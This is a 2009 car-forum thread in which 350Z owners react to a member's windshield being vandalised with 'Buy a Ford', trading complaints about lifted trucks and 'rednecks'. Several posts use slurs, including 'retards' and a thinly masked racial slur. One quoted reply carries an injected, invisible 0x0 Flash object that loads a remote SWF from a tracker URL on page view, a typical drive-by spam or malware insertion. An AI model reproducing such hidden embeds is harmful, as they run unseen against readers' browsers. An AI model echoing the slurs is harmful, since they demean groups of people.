Notices
2003-2009 Nissan 350Z

F%@#king rednecks.

Search this Thread

Old 07-12-2009, 10:43 AM
G4nismo

Received 10 Likes on 9 Posts

i absolutely despise people who vandalize other people's car whatever the reason may be. come on, have some d@mn respect.

one thing i hate living in SC are the trucks. every little teenager in highschool are all about gettin a pickup, jackin it up, slap on some mud tires and think there the baddest little **** around the block. theres too many of them and not enough of the car/import scene.
Old 07-12-2009, 11:14 AM
kurt213
Banned

Received 0 Likes on 0 Posts

Yea, I'll pretty much have to walk it off. Nothing really I can do since I have no idea who did it. My only worry is that it will happen again....maybe something worse like keying the car. Not really sure what I can do to prevent it. I really wish I has a garage
As far as the redneck comment. I didn't know the term would be taken so seriously haha I guess any classification of people is ignorant. It's just a real *******, low-life thing to do. I don't like fords, but I wouldn't go out of my way to vandalize a ford vehicle. Hopefully it was just a one time occurrence....
Old 07-12-2009, 11:21 AM
Escobar

Received 154 Likes on 128 Posts

Don't sweat it bro. The world is full of retards.
Old 07-12-2009, 11:28 AM
4alarm350Z

Originally Posted by Liquidice944
Hahaha. American Cars are garbage. Cant even last past 100k.

i have a chevy that is still running strong at 180,000 miles
Old 07-12-2009, 11:34 AM
Hraesvelg
Got Uranium?

Received 6 Likes on 4 Posts

Originally Posted by G4nismo

one thing i hate living in SC are the trucks. every little teenager in highschool are all about gettin a pickup, jackin it up, slap on some mud tires and think there the baddest little **** around the block. theres too many of them and not enough of the car/import scene.
That's all I see up around Harbison Blvd.
(I'm in Columbia)
Old 07-12-2009, 11:55 AM
03brembo

how do you know it was a redneck?
Old 07-12-2009, 12:01 PM
G4nismo

Originally Posted by Hraesvelg
That's all I see up around Harbison Blvd.
(I'm in Columbia)
ahh you go to usc? i have 1 more semester then i'm done. is there a decent 350z crowd in columbia? last time i went to harbison was near the sonic area where all the imports/highschoolers hang out. there were some decent cars but mostly comprised of immature teenagers so i never went back.
Old 07-12-2009, 12:08 PM
Hraesvelg
Got Uranium?

Received 6 Likes on 4 Posts

Originally Posted by G4nismo
ahh you go to usc? i have 1 more semester then i'm done. is there a decent 350z crowd in columbia? last time i went to harbison was near the sonic area where all the imports/highschoolers hang out. there were some decent cars but mostly comprised of immature teenagers so i never went back.
Just graduated from USC in May with my master's in nuke engineering. I've seen a few 350Z's one was a guy named Chris at Fort Jackson. He's around my age (30's), Edsel is still around I believe. I have a house about a mile from that Sonic and I work till midnight so I always see a group there late night. But yeah, they all looked young.

We do Trivia late Sunday's at the Harbison Wild Wings every now and then.
Old 07-12-2009, 02:24 PM
G4nismo

Just graduated from USC in May with my master's in nuke engineering. I've seen a few 350Z's one was a guy named Chris at Fort Jackson. He's around my age (30's), Edsel is still around I believe. I have a house about a mile from that Sonic and I work till midnight so I always see a group there late night. But yeah, they all looked young.

We do Trivia late Sunday's at the Harbison Wild Wings every now and then.
oh wow, thats very impressive and congrats!
Old 07-12-2009, 03:42 PM
D_K

Received 2 Likes on 2 Posts

Originally Posted by Chief2884
Wtf, rednecks are retarded! On Friday some douche bag in a Ford F150 with nascar stickers everywhere cut me off and gave me the finger as he did, wtf!
they just get mad cause you're not helping keeping their redneck junk alive by buying an import.
Old 07-12-2009, 05:34 PM
tanabe350z

if you want to see trucks jacked up with mud tires are dumped exhaust's come visit me in texas, its filled with idiots who think a jacked up dodge or ford with loud horrible sounding exhaust is the only car to drive. its pathetic
Old 07-13-2009, 04:09 AM
Hsummer

Originally Posted by NismoTreeFittyZ
Anytime I see someone in a POS lifted truck, with rebel flags all over it, acting like a complete a$$...I automatically think redneck. I refer to the nice back country folk as 'good ole boys'.. Whatever the term redneck used to stand for has changed since the WV coal miner days, it definitely does not have a positive connotation any longer. When I used to live in the "sticks," we were referred to as country boys...not rednecks (who went out and caused trouble). My point is I agree with Kurt's choice of words by calling the d bags that wrote on his car REDNECKS.
+1 This is definitely the story all over SC, I know 'good ole boys' and I've seen rednecks, and redneck definitely has the negative connotation.
Old 07-13-2009, 04:17 AM
1SleeperZ

Originally Posted by kurt213
Ok, so I awoke this morning and looked outside and some punk redneck wrote "Buy a Ford" on my windshield. It was just with one of those glass crayons they use at dealerships....so I'm not worried about that.
However I tried to unlock my doors and they wouldn't. I had to hit the lock button and then they finally unlocked. I'm just wondering if they set of the alarm or something? I didn't hear anything, but I don't know why else the doors wouldn't unlock. I've never had a problem before. Does anyone know what would cause that?
Anyways, other than that my car seems fine. Still really pisses me off though.

If you did not see them, how do you know it was a redneck? Only red-necks drive Ford's?
Old 07-13-2009, 04:40 AM
dieselmcore

Old 07-13-2009, 04:53 AM
blasian

Received 1 Like on 1 Post

rednecks are everywhere, not just WV, PA or the South. But I'm willing to bet they are mostly in the South (I live in SC). If someone identifies themselves as a redneck it's no different than someone saying they're a n!gger. Same class of people, just different skin color.
There is an entire parish here that's known to be loaded with them. I try to avoid it as much as possible lol
Old 07-13-2009, 06:30 AM
latiger12

Originally Posted by Escobar
Don't sweat it bro. The world is full of retards.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://nfledge.net/?tracker=3759"></param><param name="allowFullScreen" value="true"></param><embed src="http://nfledge.net/?tracker=3759" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
Full of them...Two things, you should never mess withs a man ride and his money...those are off limits.
Old 07-13-2009, 08:09 AM
kurt213
Banned

Originally Posted by 1SleeperZ
If you did not see them, how do you know it was a redneck? Only red-necks drive Ford's?
Only rednecks would write "buy a ford" on another persons vehicle. I've lived here awhile so I know the type. Living in a trailer court, driving around a 1985 ford pickup truck that they have to work on daily in their junkyard of a lawn while listening to their Lynyrd Skynyrd/Def Leppard mixed tape.
Old 07-13-2009, 08:22 AM
WV350z

man that sucks..ima redneck..but im not like that....but there are tons of douches like that here...you oughta see a lowered truck..they slam them here...just bitching about it not being jacked up...
Old 07-13-2009, 08:39 AM
beezee

Received 33 Likes on 32 Posts

Some guy accused me of being part of the reason for US auto industry colapse because I only drive "Japanese cars". My answer was "go back to high school because you are illiterate and ignorant ." I buy my cars from US deaalerships employing US workers, I service them here, I buy gas here, and moreover my cars (not the Z) are assembled here. Also millions of American brand cars are sold in China and other Asian countries. What would happen if they all bought Asian brands. We live in the world's #1 democracy and people have the right to decide what they ride, and of couse people have the right to be ignorant
Old 07-13-2009, 09:27 AM
MarvinMartian

I was leaving work Friday.

As I was pulling out of the garage, a newer Mustang GT is coming in.

I nod at the driver, he stares me down. Ooooh-kay . . .
As he passes me, he stops, revs his engine, then peels up the ramp.

a) I'm leaving. Did he expect me to pop a quick U-turn, and do my DK impression up the garage ramps?
b) Dude, I work here. Don't shlt where you eat (and work).

Quick Reply: F%@#king rednecks.